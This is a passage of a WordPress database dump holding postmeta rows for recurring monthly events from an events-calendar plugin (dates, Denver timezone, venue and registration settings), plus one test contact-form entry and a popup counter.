10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115848,262800,'_EventShowMapLink','1'),(115837,262800,'protect_children',''),(115838,262800,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511405;s:12:\"_EventOrigin\";i:1607511405;s:13:\"_thumbnail_id\";i:1607511405;s:26:\"_RTECregistrationsDisabled\";i:1607511405;s:17:\"_RTECdeadlineType\";i:1607511405;s:19:\"_RTECwhoCanRegister\";i:1607511405;s:23:\"_RTEClimitRegistrations\";i:1607511405;s:21:\"_RTECmaxRegistrations\";i:1607511405;s:24:\"boldgrid_hide_page_title\";i:1607511405;s:16:\"_EventRecurrence\";i:1607511405;s:17:\"_EventShowMapLink\";i:1607511405;s:13:\"_EventShowMap\";i:1607511405;s:13:\"_EventVenueID\";i:1607511405;s:20:\"_EventCurrencySymbol\";i:1607511405;s:22:\"_EventCurrencyPosition\";i:1607511405;s:10:\"_EventCost\";i:1607511405;s:9:\"_EventURL\";i:1607511405;s:14:\"_EventTimezone\";i:1607511405;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511405;s:16:\"tribe_events_cat\";i:1607536605;}'),(115836,262800,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511405;s:12:\"_EventOrigin\";i:1607511405;s:13:\"_thumbnail_id\";i:1607511405;s:26:\"_RTECregistrationsDisabled\";i:1607511405;s:17:\"_RTECdeadlineType\";i:1607511405;s:19:\"_RTECwhoCanRegister\";i:1607511405;s:23:\"_RTEClimitRegistrations\";i:1607511405;s:21:\"_RTECmaxRegistrations\";i:1607511405;s:24:\"boldgrid_hide_page_title\";i:1607511405;s:16:\"_EventRecurrence\";i:1607511405;s:17:\"_EventShowMapLink\";i:1607511405;s:13:\"_EventShowMap\";i:1607511405;s:13:\"_EventVenueID\";i:1607511405;s:20:\"_EventCurrencySymbol\";i:1607511405;s:22:\"_EventCurrencyPosition\";i:1607511405;s:10:\"_EventCost\";i:1607511405;s:9:\"_EventURL\";i:1607511405;s:14:\"_EventTimezone\";i:1607511405;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511405;s:16:\"tribe_events_cat\";i:1607536605;}'),(114755,262801,'_RTECdeadlineType','start'),(114756,262801,'_RTECwhoCanRegister','any'),(114757,262801,'_RTEClimitRegistrations','0'),(114758,262801,'_RTECmaxRegistrations','30'),(114759,262801,'boldgrid_hide_page_title','1'),(120906,263177,'_dp_original','263018'),(120907,263177,'_edit_lock','1609540775:2'),(120904,263177,'_EventVenueID','262435'),(114773,262801,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(114774,262801,'_EventShowMapLink','1'),(114775,262801,'_EventShowMap','1'),(114776,262801,'_EventVenueID','262507'),(114777,262801,'_EventStartDate','2020-12-20 09:00:00'),(114778,262801,'_EventEndDate','2020-12-20 10:15:00'),(114779,262801,'_EventStartDateUTC','2020-12-20 16:00:00'),(114780,262801,'_EventEndDateUTC','2020-12-20 17:15:00'),(114781,262801,'_EventDuration','4500'),(114782,262801,'_EventCurrencySymbol',''),(114783,262801,'_EventCurrencyPosition','prefix'),(114784,262801,'_EventCost',''),(114785,262801,'_EventURL',''),(114786,262801,'_EventTimezone','America/Denver'),(114787,262801,'_EventTimezoneAbbr','MST'),(115089,262813,'protect_children',''),(115090,262813,'_tribe_modified_fields','a:6:{s:16:\"protect_children\";i:1607510921;s:12:\"_EventOrigin\";i:1607510921;s:10:\"_edit_last\";i:1607510959;s:10:\"post_title\";i:1607511035;s:12:\"post_content\";i:1607511035;s:11:\"post_status\";i:1607510959;}'),(115091,262813,'_EventOrigin','events-calendar'),(115092,262813,'_edit_lock','1607536311:2'),(115093,262813,'_edit_last','2'),(115094,262814,'protect_children',''),(115095,262814,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607511117;s:12:\"_EventOrigin\";i:1607511117;s:10:\"_edit_last\";i:1607511133;s:10:\"post_title\";i:1607511146;s:11:\"post_status\";i:1607511271;s:12:\"post_content\";i:1607511271;s:16:\"tribe_events_cat\";i:1607536536;s:13:\"_thumbnail_id\";i:1607511271;s:26:\"_RTECregistrationsDisabled\";i:1607511271;s:17:\"_RTECdeadlineType\";i:1607511271;s:19:\"_RTECwhoCanRegister\";i:1607511271;s:23:\"_RTEClimitRegistrations\";i:1607511271;s:21:\"_RTECmaxRegistrations\";i:1607511271;s:24:\"boldgrid_hide_page_title\";i:1607511271;s:16:\"_EventRecurrence\";i:1607511271;s:17:\"_EventShowMapLink\";i:1607511271;s:13:\"_EventShowMap\";i:1607511271;s:13:\"_EventVenueID\";i:1607511271;s:15:\"_EventStartDate\";i:1607511271;s:13:\"_EventEndDate\";i:1607511271;s:18:\"_EventStartDateUTC\";i:1607511271;s:16:\"_EventEndDateUTC\";i:1607511271;s:14:\"_EventDuration\";i:1607511271;s:20:\"_EventCurrencySymbol\";i:1607511271;s:22:\"_EventCurrencyPosition\";i:1607511271;s:10:\"_EventCost\";i:1607511271;s:9:\"_EventURL\";i:1607511271;s:14:\"_EventTimezone\";i:1607511271;s:18:\"_EventTimezoneAbbr\";i:1607511271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;}'),(115096,262814,'_EventOrigin','events-calendar'),(114793,262803,'_EventStartDate','2021-01-17 09:00:00'),(114794,262803,'_EventStartDateUTC','2021-01-17 16:00:00'),(114795,262803,'_EventEndDate','2021-01-17 10:15:00'),(151809,266081,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(114796,262803,'_EventEndDateUTC','2021-01-17 17:15:00'),(114797,262803,'_EventDuration','4500'),(116152,262803,'_EventShowMap','1'),(116153,262803,'_EventVenueID','262507'),(116154,262803,'_EventCurrencySymbol',''),(116155,262803,'_EventCurrencyPosition','prefix'),(116156,262803,'_EventCost',''),(116157,262803,'_EventURL',''),(116158,262803,'_EventTimezone','America/Denver'),(116159,262803,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116144,262803,'_RTECregistrationsDisabled','1'),(116145,262803,'_RTECdeadlineType','start'),(116146,262803,'_RTECwhoCanRegister','any'),(116147,262803,'_RTEClimitRegistrations','0'),(116148,262803,'_RTECmaxRegistrations','30'),(116142,262803,'_EventOrigin','events-calendar'),(116149,262803,'boldgrid_hide_page_title','1'),(116150,262803,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(116151,262803,'_EventShowMapLink','1'),(116140,262803,'protect_children',''),(116141,262803,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511470;s:12:\"_EventOrigin\";i:1607511470;s:13:\"_thumbnail_id\";i:1607511470;s:26:\"_RTECregistrationsDisabled\";i:1607511470;s:17:\"_RTECdeadlineType\";i:1607511470;s:19:\"_RTECwhoCanRegister\";i:1607511470;s:23:\"_RTEClimitRegistrations\";i:1607511470;s:21:\"_RTECmaxRegistrations\";i:1607511470;s:24:\"boldgrid_hide_page_title\";i:1607511470;s:16:\"_EventRecurrence\";i:1607511470;s:17:\"_EventShowMapLink\";i:1607511470;s:13:\"_EventShowMap\";i:1607511470;s:13:\"_EventVenueID\";i:1607511470;s:20:\"_EventCurrencySymbol\";i:1607511470;s:22:\"_EventCurrencyPosition\";i:1607511470;s:10:\"_EventCost\";i:1607511470;s:9:\"_EventURL\";i:1607511470;s:14:\"_EventTimezone\";i:1607511470;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511470;s:16:\"tribe_events_cat\";i:1607536670;}'),(116139,262803,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511470;s:12:\"_EventOrigin\";i:1607511470;s:13:\"_thumbnail_id\";i:1607511470;s:26:\"_RTECregistrationsDisabled\";i:1607511470;s:17:\"_RTECdeadlineType\";i:1607511470;s:19:\"_RTECwhoCanRegister\";i:1607511470;s:23:\"_RTEClimitRegistrations\";i:1607511470;s:21:\"_RTECmaxRegistrations\";i:1607511470;s:24:\"boldgrid_hide_page_title\";i:1607511470;s:16:\"_EventRecurrence\";i:1607511470;s:17:\"_EventShowMapLink\";i:1607511470;s:13:\"_EventShowMap\";i:1607511470;s:13:\"_EventVenueID\";i:1607511470;s:20:\"_EventCurrencySymbol\";i:1607511470;s:22:\"_EventCurrencyPosition\";i:1607511470;s:10:\"_EventCost\";i:1607511470;s:9:\"_EventURL\";i:1607511470;s:14:\"_EventTimezone\";i:1607511470;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511470;s:16:\"tribe_events_cat\";i:1607536670;}'),(116226,262807,'_EventOrigin','events-calendar'),(116233,262807,'boldgrid_hide_page_title','1'),(116234,262807,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(114823,262804,'_EventStartDate','2021-02-21 09:00:00'),(114824,262804,'_EventStartDateUTC','2021-02-21 16:00:00'),(114825,262804,'_EventEndDate','2021-02-21 10:15:00'),(114826,262804,'_EventEndDateUTC','2021-02-21 17:15:00'),(114827,262804,'_EventDuration','4500'),(116173,262804,'_EventShowMap','1'),(116174,262804,'_EventVenueID','262507'),(116175,262804,'_EventCurrencySymbol',''),(116176,262804,'_EventCurrencyPosition','prefix'),(116177,262804,'_EventCost',''),(116178,262804,'_EventURL',''),(116179,262804,'_EventTimezone','America/Denver'),(116180,262804,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116165,262804,'_RTECregistrationsDisabled','1'),(116166,262804,'_RTECdeadlineType','start'),(116167,262804,'_RTECwhoCanRegister','any'),(116168,262804,'_RTEClimitRegistrations','0'),(116169,262804,'_RTECmaxRegistrations','30'),(116163,262804,'_EventOrigin','events-calendar'),(116170,262804,'boldgrid_hide_page_title','1'),(116171,262804,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(116172,262804,'_EventShowMapLink','1'),(116161,262804,'protect_children',''),(116162,262804,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(116160,262804,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(114853,262805,'_EventStartDate','2021-03-21 09:00:00'),(114854,262805,'_EventStartDateUTC','2021-03-21 15:00:00'),(114855,262805,'_EventEndDate','2021-03-21 10:15:00'),(116242,262807,'_EventTimezone','America/Denver'),(114856,262805,'_EventEndDateUTC','2021-03-21 16:15:00'),(116241,262807,'_EventURL',''),(114857,262805,'_EventDuration','4500'),(116194,262805,'_EventShowMap','1'),(116195,262805,'_EventVenueID','262507'),(116196,262805,'_EventCurrencySymbol',''),(116197,262805,'_EventCurrencyPosition','prefix'),(116198,262805,'_EventCost',''),(116199,262805,'_EventURL',''),(116200,262805,'_EventTimezone','America/Denver'),(116201,262805,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116186,262805,'_RTECregistrationsDisabled','1'),(116187,262805,'_RTECdeadlineType','start'),(116188,262805,'_RTECwhoCanRegister','any'),(116189,262805,'_RTEClimitRegistrations','0'),(116190,262805,'_RTECmaxRegistrations','30'),(116184,262805,'_EventOrigin','events-calendar'),(116191,262805,'boldgrid_hide_page_title','1'),(116192,262805,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(116193,262805,'_EventShowMapLink','1'),(116182,262805,'protect_children',''),(116183,262805,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(116181,262805,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(116239,262807,'_EventCurrencyPosition','prefix'),(116240,262807,'_EventCost',''),(116238,262807,'_EventCurrencySymbol',''),(116235,262807,'_EventShowMapLink','1'),(114883,262806,'_EventStartDate','2021-04-18 09:00:00'),(114884,262806,'_EventStartDateUTC','2021-04-18 15:00:00'),(114885,262806,'_EventEndDate','2021-04-18 10:15:00'),(116237,262807,'_EventVenueID','262507'),(114886,262806,'_EventEndDateUTC','2021-04-18 16:15:00'),(116236,262807,'_EventShowMap','1'),(114887,262806,'_EventDuration','4500'),(116388,262857,'_EventTimezoneAbbr','MST'),(116215,262806,'_EventShowMap','1'),(116216,262806,'_EventVenueID','262507'),(116217,262806,'_EventCurrencySymbol',''),(116218,262806,'_EventCurrencyPosition','prefix'),(116219,262806,'_EventCost',''),(116220,262806,'_EventURL',''),(116221,262806,'_EventTimezone','America/Denver'),(116222,262806,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116207,262806,'_RTECregistrationsDisabled','1'),(116208,262806,'_RTECdeadlineType','start'),(116209,262806,'_RTECwhoCanRegister','any'),(116210,262806,'_RTEClimitRegistrations','0'),(116211,262806,'_RTECmaxRegistrations','30'),(116205,262806,'_EventOrigin','events-calendar'),(116212,262806,'boldgrid_hide_page_title','1'),(116213,262806,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(116214,262806,'_EventShowMapLink','1'),(116203,262806,'protect_children',''),(116204,262806,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(116202,262806,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(114913,262807,'_EventStartDate','2021-05-16 09:00:00'),(114914,262807,'_EventStartDateUTC','2021-05-16 15:00:00'),(114915,262807,'_EventEndDate','2021-05-16 10:15:00'),(114916,262807,'_EventEndDateUTC','2021-05-16 16:15:00'),(114917,262807,'_EventDuration','4500'),(116387,262857,'_EventTimezone','America/Denver'),(94789,261902,'protect_children',''),(94790,261902,'_field_312','Test'),(94791,261902,'_field_313','Message'),(94792,261902,'_field_333','5555555555'),(94793,261902,'_field_314','choll.03@comcast.net'),(94794,261902,'_field_315','This is a test'),(94795,261902,'_field_316','adsadsgkjasd;lkgj;asdga\ngasd\n\nasdgas\nda\nsdgasdasdgadfhafas'),(94796,261902,'_form_id','35'),(94797,261902,'_seq_num','37'),(94774,261877,'popup_open_count_total','5'),(94775,261877,'popup_last_opened','1599567110'),(104109,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(104125,262441,'_EventShowMap',''),(104129,262441,'_EventEndDateUTC','2020-12-17 